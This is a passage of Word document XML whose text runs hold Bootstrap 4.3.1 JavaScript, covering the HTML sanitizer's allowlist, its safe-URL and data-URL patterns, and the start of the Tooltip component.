      <w:r>
        <w:t xml:space="preserve">    ol: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    p: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    pre: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    s: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    small: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    span: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    sub: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    sup: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    strong: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    u: [],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ul: []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A pattern that recognizes a commonly useful subset of URLs that are safe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">     *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">     * Shoutout to Angular 7 https://github.com/angular/angular/blob/7.2.4/packages/core/src/sanitization/url_sanitizer.ts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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SAFE_URL_PATTERN = /^(?:(?:https?|mailto|ftp|tel|file):|[^&amp;:/?#]*(?:[/?#]|$))/gi;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A pattern that matches safe data URLs. Only matches image, video and audio types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">   *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">   * Shoutout to Angular 7 https://github.com/angular/angular/blob/7.2.4/packages/core/src/sanitization/url_sanitizer.ts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DATA_URL_PATTERN = /^data:(?:image\/(?:bmp|gif|jpeg|jpg|png|tiff|webp)|video\/(?:mpeg|mp4|ogg|webm)|audio\/(?:mp3|oga|ogg|opus));base64,[a-z0-9+/]+=*$/i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  function allowedAttribute(attr, allowedAttributeList) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var attrName = attr.nodeName.toLowerCase();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    if (allowedAttributeList.indexOf(attrName) !== -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (uriAttrs.indexOf(attrName) !== -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return Boolean(attr.nodeValue.match(SAFE_URL_PATTERN) || attr.nodeValue.match(DATA_URL_PATTERN));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true;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    var regExp = allowedAttributeList.filter(function (attrRegex) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return attrRegex instanceof RegExp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    }); // Check if a regular expression validates the attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    for (var i = 0, l = regExp.length; i &lt; l; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (attrName.match(regExp[i])) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return true;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return false;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function sanitizeHtml(unsafeHtml, whiteList, sanitizeFn) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    if (unsafeHtml.length === 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return unsafeHtml;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if (sanitizeFn &amp;&amp; typeof sanitizeFn === 'function') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return sanitizeFn(unsafeHtml);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var domParser = new window.DOMParser();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var createdDocument = domParser.parseFromString(unsafeHtml, 'text/html');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var whitelistKeys = Object.keys(whiteList);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    var elements = [].slice.call(createdDocument.body.querySelectorAll('*'));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var _loop = function _loop(i, len) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var el = elements[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var elName = el.nodeName.toLowerCase();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (whitelistKeys.indexOf(el.nodeName.toLowerCase()) === -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        el.parentNode.removeChild(el);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return "continue";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attributeList = [].slice.call(el.attributes);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var whitelistedAttributes = [].concat(whiteList['*'] || [], whiteList[elName] || []);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      attributeList.forEach(function (attr) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (!allowedAttribute(attr, whitelistedAttributes)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          el.removeAttribute(attr.nodeName);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for (var i = 0, len = elements.length; i &lt; len; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _ret = _loop(i, len);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (_ret === "continue") continue;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return createdDocument.body.innerHTML;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  }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NAME$6 = 'tooltip';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var VERSION$6 = '4.3.1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_KEY$6 = 'bs.tooltip';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var EVENT_KEY$6 = "." + DATA_KEY$6;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var JQUERY_NO_CONFLICT$6 = $.fn[NAME$6];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var CLASS_PREFIX = 'bs-tooltip';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var BSCLS_PREFIX_REGEX = new RegExp("(^|\\s)" + CLASS_PREFIX + "\\S+", 'g');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DISALLOWED_ATTRIBUTES = ['sanitize', 'whiteList', 'sanitizeFn'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DefaultType$4 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    animation: 'boolean',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    template: 'string',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    title: '(string|element|function)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    trigger: 'string',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    delay: '(number|object)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    html: 'boolean',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    selector: '(string|boolean)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    placement: '(string|function)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    offset: '(number|string|function)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    container: '(string|element|boolean)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    fallbackPlacement: '(string|array)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    boundary: '(string|element)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    sanitize: 'boolean',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    sanitizeFn: '(null|function)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    whiteList: 'object'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AttachmentMap$1 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    AUTO: 'auto',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    TOP: 'top',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    RIGHT: 'right',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    BOTTOM: 'bottom',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    LEFT: 'left'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Default$4 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    animation: true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    template: '&lt;div class="tooltip" role="tooltip"&gt;' + '&lt;div class="arrow"&gt;&lt;/div&gt;' + '&lt;div class="tooltip-inner"&gt;&lt;/div&gt;&lt;/div&gt;',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    trigger: 'hover focus',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    title: '',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    delay: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    html: false,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    selector: false,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    placement: 'top',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    offset: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    container: false,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    fallbackPlacement: 'flip',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    boundary: 'scrollParent',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    sanitize: true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    sanitizeFn: null,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    whiteList: DefaultWhitelist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HoverState = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOW: 'show',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    OUT: 'out'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Event$6 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDE: "hide" + EVENT_KEY$6,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDDEN: "hidden" + EVENT_KEY$6,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOW: "show" + EVENT_KEY$6,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOWN: "shown" + EVENT_KEY$6,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    INSERTED: "inserted" + EVENT_KEY$6,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLICK: "click" + EVENT_KEY$6,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FOCUSIN: "focusin" + EVENT_KEY$6,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FOCUSOUT: "focusout" + EVENT_KEY$6,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    MOUSEENTER: "mouseenter" + EVENT_KEY$6,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    MOUSELEAVE: "mouseleave" + EVENT_KEY$6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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  var ClassName$6 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FADE: 'fade',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOW: 'show'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Selector$6 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    TOOLTIP: '.tooltip',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    TOOLTIP_INNER: '.tooltip-inner',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ARROW: '.arrow'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Trigger = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HOVER: 'hover',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FOCUS: 'focus',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLICK: 'click',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    MANUAL: 'manual'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Tooltip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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    function Tooltip(element, config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      /**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">       * Check for Popper dependency</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">       * Popper - https://popper.js.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">       */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (typeof Popper === 'undefined') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        throw new TypeError('Bootstrap\'s tooltips require Popper.js (https://popper.js.org/)');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      } // private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  this._isEnabled = true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._timeout = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._hoverState = '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._activeTrigger = {};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._popper = null; // Protected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.element = element;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.config = this._getConfig(config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.tip = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._setListeners();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Tooltip.prototype;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_proto.enable = function enable() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isEnabled = true;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_proto.disable = function disable() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isEnabled = false;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_proto.toggleEnabled = function toggleEnabled() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isEnabled = !this._isEnabled;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_proto.toggle = function toggle(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!this._isEnabled)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(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var dataKey = this.constructor.DATA_KEY;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var context = $(event.currentTarget).data(dataKey);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (!context) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          context = new this.constructor(event.currentTarget, this._getDelegateConfig());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          $(event.currentTarget).data(dataKey, context);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context._activeTrigger.click = !context._activeTrigger.click;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (context._isWithActiveTrigger()) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
